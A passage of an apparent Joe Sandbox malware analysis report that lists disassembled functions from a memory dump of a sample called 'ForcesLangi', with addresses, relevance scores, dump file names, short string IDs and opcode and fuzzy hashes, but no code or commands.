                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F12876B496118FDF048EBCD4D53DE7BF2AB4B324F206619C415BBB94C22A841ECB51
                                                                                                                                                                                                                                              Function 6CE2B050 Relevance: 3.4, APIs: 2, Instructions: 423COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 138b193b12ff7994e53b35290106f589f441eb157fbf0e37fe7476682fe6f370
                                                                                                                                                                                                                                              • Instruction ID: e7d7d1957c7a56c6441dfc0e2f5b15fd19c8865ec6e731a2649fa7a074466924
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 138b193b12ff7994e53b35290106f589f441eb157fbf0e37fe7476682fe6f370
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55D10376E416068FDF04CE7CC9D57EE77F29B47324F248525C522DBB94C22E8A0A8B41
                                                                                                                                                                                                                                              Function 6CE2D900 Relevance: 3.2, Strings: 2, Instructions: 704COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: QP,m$\w!u
                                                                                                                                                                                                                                              • API String ID: 0-581249642
                                                                                                                                                                                                                                              • Opcode ID: 24df9089ac75e435283f65e715bb53468a6bc79b613cbd85605655fac0a6a885
                                                                                                                                                                                                                                              • Instruction ID: ef576043ff095fb7acb2a7a1efe06e33ba4231d16a840b1f198027c32ab89f20
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24df9089ac75e435283f65e715bb53468a6bc79b613cbd85605655fac0a6a885
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3932573AA446118FDF04CEBCC5953DE77F2AB57325F359219E521EBB94C22E890ACB40
                                                                                                                                                                                                                                              Function 6CE0DED0 Relevance: 3.1, Strings: 2, Instructions: 635COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: _Nx5$_Nx5
                                                                                                                                                                                                                                              • API String ID: 0-2428191651
                                                                                                                                                                                                                                              • Opcode ID: 8fe4fc08cf86152e33d047b9fd818372178bfda8a17f7e915d10948e1804e44d
                                                                                                                                                                                                                                              • Instruction ID: 5810a62a46ed984d7fac0e2427b63f9d0fe6d090af8776263a2998822d92afb1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe4fc08cf86152e33d047b9fd818372178bfda8a17f7e915d10948e1804e44d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E22E03AB15A058FCF04CEBCD5D12DD7BF2AB86314F34852AE451E7790D23A990ACB81
                                                                                                                                                                                                                                              Function 6CE24C00 Relevance: 3.1, Strings: 2, Instructions: 597COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ~E$~E
                                                                                                                                                                                                                                              • API String ID: 0-2867264573
                                                                                                                                                                                                                                              • Opcode ID: cfb0858f5fbafeeaddaaf5655af7d9568565dd30e169e5fa367a28077ae42e78
                                                                                                                                                                                                                                              • Instruction ID: fccfcf98bb5793d644f3ee335a880be125656a9d459cf1466a88afe968e8edc6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfb0858f5fbafeeaddaaf5655af7d9568565dd30e169e5fa367a28077ae42e78
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66127636A515418FCF04CE7CC9D53CE7BF2AB4B325F38521AD511EBB98C22E890A9B14
                                                                                                                                                                                                                                              Function 6CE29CC0 Relevance: 3.0, Strings: 2, Instructions: 532COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @kOW$@kOW
                                                                                                                                                                                                                                              • API String ID: 0-2146169918
                                                                                                                                                                                                                                              • Opcode ID: aa5f07ea1169338d8d6470aa37088b072c258cc8b1d3877aa3657a23a9940a71
                                                                                                                                                                                                                                              • Instruction ID: ecbbf0faf5a3f744079408b4bc4573af567b2056f1fc989c099d67e7151ae0ec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa5f07ea1169338d8d6470aa37088b072c258cc8b1d3877aa3657a23a9940a71
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16023376A852048FDF08CEBCD5C53CE7BF2AB87328F346115D411E7B94D22E990A8B91
                                                                                                                                                                                                                                              Function 6CE11260 Relevance: 3.0, Strings: 2, Instructions: 527COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (g5$(g5
                                                                                                                                                                                                                                              • API String ID: 0-4174432146
                                                                                                                                                                                                                                              • Opcode ID: 97295da8a7794ed843c967c9d229ea6b7f979918f1aa96fd44a195d2e57fabc0
                                                                                                                                                                                                                                              • Instruction ID: 090a5e64a5e3a56a7421154e4b15419b45be2eac7b438581121db4ebc6f3cbb5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97295da8a7794ed843c967c9d229ea6b7f979918f1aa96fd44a195d2e57fabc0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95022176B495058FCB08CEFCC1953DE77F29B6B325F20A119D421E7F94C52ACA0A8B94
                                                                                                                                                                                                                                              Function 6CE25430 Relevance: 3.0, Strings: 2, Instructions: 503COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "\UA$"\UA
                                                                                                                                                                                                                                              • API String ID: 0-1621468777
                                                                                                                                                                                                                                              • Opcode ID: f77219d2444bd6a1909b6e7beb5d7a1d91dad2f241c97654193c084212413698
                                                                                                                                                                                                                                              • Instruction ID: 3c462d193dd34ca19a65df857200d653b6eb32b12b89302cfd781c516a305abc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f77219d2444bd6a1909b6e7beb5d7a1d91dad2f241c97654193c084212413698
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF12936B526068FDF048D7CCAD53EE3BF2AB433A5F349515D511DBB98C62E890A8780
                                                                                                                                                                                                                                              Function 6CE10900 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: r[}"$r[}"
                                                                                                                                                                                                                                              • API String ID: 0-765748070
                                                                                                                                                                                                                                              • Opcode ID: 0346caeb35a8146e9998bb5d8199b7f41d97298020003ee21e67a02f05ac2a99
                                                                                                                                                                                                                                              • Instruction ID: 3097553bc57c82cde4e044b9ed24718ba4ff6abf5ccac1f606ecff7ccdb4e3d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0346caeb35a8146e9998bb5d8199b7f41d97298020003ee21e67a02f05ac2a99
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F14936B491418FCF08CE7CDA967CD7BF2AB8B364F245619D811EBFD4C22A45698B10
                                                                                                                                                                                                                                              Function 6CE11990 Relevance: 3.0, Strings: 2, Instructions: 487COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: dQV;$dQV;
                                                                                                                                                                                                                                              • API String ID: 0-3760431708
                                                                                                                                                                                                                                              • Opcode ID: aae4b23577271d6a073f48758bf148101855a4453085db47b56671999b5703f0
                                                                                                                                                                                                                                              • Instruction ID: 15223c4b7978d87ceb55723f184339855f145706e1bfb929e251b8b6489c2f4c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aae4b23577271d6a073f48758bf148101855a4453085db47b56671999b5703f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF12136B091058FCF088EBCC9953DD7BF2AB6B354F249619C411EBF94D22A8D0ACB54
                                                                                                                                                                                                                                              Function 6CE2C9C0 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: GH$GH
                                                                                                                                                                                                                                              • API String ID: 0-1603655936
                                                                                                                                                                                                                                              • Opcode ID: 93df9cfe6192971ff493bff1ffef66e9c2eb6ebefab0af0110b20abd95915c88
                                                                                                                                                                                                                                              • Instruction ID: 1e992f9a2aa772240c0a60f044f299b4319de788059e639952467a4a71863de7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93df9cfe6192971ff493bff1ffef66e9c2eb6ebefab0af0110b20abd95915c88
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24F1F076B506048FEF04DEBCD4D13DEBBF2AB4B324F345519E821DB794C22A990A8B40
                                                                                                                                                                                                                                              Function 6CE0E7B0 Relevance: 3.0, Strings: 2, Instructions: 460COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: qh~#$qh~#
                                                                                                                                                                                                                                              • API String ID: 0-2372752759
                                                                                                                                                                                                                                              • Opcode ID: 4039d1960b4957c3f5929eaeb5ed5fc2630e47f41c177f55fdfeae87302c39ee
                                                                                                                                                                                                                                              • Instruction ID: d9aed4cfc3a7b18f4e9fe590625992b9912b4a4823daa00879d602acd8643471
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4039d1960b4957c3f5929eaeb5ed5fc2630e47f41c177f55fdfeae87302c39ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E10236B45E028FDB08CE7CC5953DE37F2AB47354F345529D4619BB94D22A8A0ACBD0
                                                                                                                                                                                                                                              Function 6CE1DBD0 Relevance: 2.9, Strings: 2, Instructions: 396COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: +y$+y
                                                                                                                                                                                                                                              • API String ID: 0-2413955534
                                                                                                                                                                                                                                              • Opcode ID: 4a6b46396cba29c60f78c4a1c81cbf354c9b626c7f8b289837b2cd0aee867e8f
                                                                                                                                                                                                                                              • Instruction ID: 503ea2884d7450af9df90feb8c3bb815b1981befdd5e8a93d1fe93c698313b9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a6b46396cba29c60f78c4a1c81cbf354c9b626c7f8b289837b2cd0aee867e8f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD1577AB095018FCF05CE7CD4993DE7BF2AB4B324F209119E421D7F94C2395A1A8B50
                                                                                                                                                                                                                                              Function 6CE26580 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: }.hu$}.hu
                                                                                                                                                                                                                                              • API String ID: 0-4196606155
                                                                                                                                                                                                                                              • Opcode ID: 521788e40a156ff6bcea01086794af01b5182c8b15564f67dbb567fb6237df34
                                                                                                                                                                                                                                              • Instruction ID: 8fa6754c6440b320cf496eefc99d6e6a35d546a2fcfc2349423e616b4527d3ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 521788e40a156ff6bcea01086794af01b5182c8b15564f67dbb567fb6237df34
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67B1F076A052058FCB04CEBCD6957DE77F6AB4B324F305619D801E7780CA2E990ADB51
                                                                                                                                                                                                                                              Function 6CE0C950 Relevance: 2.8, Strings: 1, Instructions: 1551COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: [m(X
                                                                                                                                                                                                                                              • API String ID: 0-1168799904
                                                                                                                                                                                                                                              • Opcode ID: 48184b43d53bf527c90a1d8dac858118a8caf04ca23ee30316380ae21371f63f
                                                                                                                                                                                                                                              • Instruction ID: 46066d28adcdba0c3e6d3359664f24262b127f2853b14922d105c213f8334496
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48184b43d53bf527c90a1d8dac858118a8caf04ca23ee30316380ae21371f63f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EB2107AB446018FDF08CE7CC5A53CD37F2AB87368F209515E8219BBD4C52A990BCB95
                                                                                                                                                                                                                                              Function 6CE174D0 Relevance: 2.8, Strings: 2, Instructions: 259COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Gak$Gak
                                                                                                                                                                                                                                              • API String ID: 0-111581651
                                                                                                                                                                                                                                              • Opcode ID: da064b4c24bcd369ef734c5ffd64bc465b265534a2ec159105771378e350bb55
                                                                                                                                                                                                                                              • Instruction ID: 91359f859969cbc709a4d796d75328f33c17a4650f825409741e556acc266cd9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da064b4c24bcd369ef734c5ffd64bc465b265534a2ec159105771378e350bb55
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9813176A495468FCF04CE7CC6917EE37F2AB43329F305519D42AD7B81C22E8A0ACB51
                                                                                                                                                                                                                                              Function 6CE16970 Relevance: 2.0, Strings: 1, Instructions: 712COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: NybH
                                                                                                                                                                                                                                              • API String ID: 0-778265418
                                                                                                                                                                                                                                              • Opcode ID: 9c0152588228ff3620c6441fd413e2ce87eb0d097b553140db5572f3a938a2c9
                                                                                                                                                                                                                                              • Instruction ID: 514922fb73df610166b9d6f931b825c5ca691359f67a158b4e6733c9c283ec63
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c0152588228ff3620c6441fd413e2ce87eb0d097b553140db5572f3a938a2c9
